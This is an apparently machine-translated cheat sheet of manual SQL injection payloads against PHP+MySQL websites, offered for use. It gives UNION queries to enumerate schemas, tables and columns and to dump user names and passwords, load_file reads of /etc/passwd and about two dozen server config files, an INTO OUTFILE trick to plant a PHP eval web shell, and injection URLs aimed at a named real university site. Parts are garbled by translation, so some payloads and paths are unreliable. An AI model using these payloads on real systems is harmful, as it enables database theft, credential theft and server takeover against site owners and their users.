Php+mysql Manual Injection Statement Daquan recommendation

Burst field length

Order by num/*

Match field

and 1=1 Union Select 1,2,3,4,5.......n/*

Storm field position

and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to storm database information

Version () database () User ()

No need to guess the available fields. Database Information (some sites do not apply):

and 1=2 UNION ALL Select Version ()/*

and 1=2 UNION ALL Select Database ()/*

and 1=2 union ALL Select User ()/*

Operating System Information:

and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:

and Ord (User (), 1, 1)) =114/* Return to normal description as root

Bauku (mysql>5.0)

MySQL 5 above has built-in library information_schema, which stores all MySQL database and table structure information

and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table

and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hex) limit 0 (start record, 0 is the first start record), 1 (show 1 Records)-

Guess Field

and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hex) Limit 0,1

Burst password

And 1=2 Union Select, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage ( One available field displays two data content):

Union Select 1,2,3concat (user name segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)

Conditions:

1, know the site physical path

2, have sufficient permission (can use Select .... from Mysql.user test)

3, MAGIC_QUOTES_GPC () =off

Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '

and 1=2 union ALL Select a sentence hex value into outfile ' path '

Load_file () Common paths:

1. Replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2, replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (32), Char
The above two are a full display of code in a php file. Sometimes you do not replace some characters, such as "<" is replaced by "space" to return a Web page. You can't see the code.
3, Load_file (char (47)) can list Freebsd,sunos system root directory
4./etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf view Linux Apache virtual Host configuration file
5. C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development site Resin file configuration information.
7. c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf View JSP virtual host for Linux system configuration
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
Ten 、.. /themes/darkblue_orange/layout.inc.php phpMyAdmin Blast Path
11. C:\windows\system32\inetsrv\MetaBase.xml View the virtual host configuration file for IIS
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin profile view
13,/usr/local/resin-pro-3.0.22/conf/resin.conf ibid.
14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view
15,/etc/sysconfig/iptables Look at the firewall policy
16, USR/LOCAL/APP/PHP5 B/php.ini PHP's equivalent settings
17./etc/my.cnf MySQL configuration file
18,/etc/redhat-release Red Hat system version
19, C:\mysql\data\mysql\user. MYD A user password exists in the MySQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21,/USR/LOCAL/APP/PHP5 B/php.ini//php Related Settings
22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//virtual Site Settings
23.C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini

website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (32))

Note:

Char denotes <

Char (+) denotes a space

Problems with manual injections:

When the post-injection page appears:

Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '

such as:Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_ File (0x433a5c626f6f742e696e69), 3,4,user ()%20

This is caused by inconsistencies in the coding,

Workaround: Add unhex (Hex (parameter)) to the parameter before you can do it. The above URL can be changed to:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20

You can continue to inject ...

Php+mysql Manual Injection statement Daquan recommended